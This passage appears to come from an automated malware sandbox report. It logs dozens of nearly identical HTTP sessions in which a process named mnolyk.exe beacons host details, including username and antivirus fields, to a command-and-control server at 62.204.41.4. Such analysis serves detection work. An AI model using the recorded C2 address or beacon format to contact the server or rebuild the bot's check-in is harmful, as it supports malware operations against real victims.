                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            439192.168.2.45013462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:29.223273039 CET628OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.288228035 CET628INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            44192.168.2.44973962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:37.573322058 CET233OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.639756918 CET233INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            440192.168.2.45013562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:29.463987112 CET629OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.525877953 CET629INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            441192.168.2.45013662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:29.705547094 CET630OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:29.769449949 CET630INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            442192.168.2.45013762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:29.950706959 CET631OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.013868093 CET631INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:29 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            443192.168.2.45013862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:30.185255051 CET632OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.258173943 CET632INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            444192.168.2.45013962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:30.435909033 CET633OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.501003027 CET633INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            445192.168.2.45014062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:30.667124033 CET634OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.729938984 CET634INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            446192.168.2.45014162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:30.904820919 CET635OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:30.967626095 CET635INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            447192.168.2.45014262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:31.136436939 CET636OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.202301025 CET636INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            448192.168.2.45014362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:31.370430946 CET637OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.433823109 CET637INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            449192.168.2.45014462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:31.611274958 CET638OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.676038027 CET638INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            45192.168.2.44974062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:37.821742058 CET234OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.884660006 CET234INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            450192.168.2.45014562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:31.864006042 CET638OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:31.926784992 CET639INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            451192.168.2.45014662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:32.113157034 CET640OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.178369999 CET640INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            452192.168.2.45014762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:32.357167959 CET641OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.422908068 CET641INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            453192.168.2.45014862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:32.593658924 CET642OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.657764912 CET642INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            454192.168.2.45014962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:32.825799942 CET643OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:32.889460087 CET643INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            455192.168.2.45015062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:33.073470116 CET644OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.136670113 CET644INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            456192.168.2.45015162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:33.307816029 CET645OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.370755911 CET645INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            457192.168.2.45015262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:33.546077967 CET646OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.608844042 CET646INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            458192.168.2.45015362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:33.775747061 CET647OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
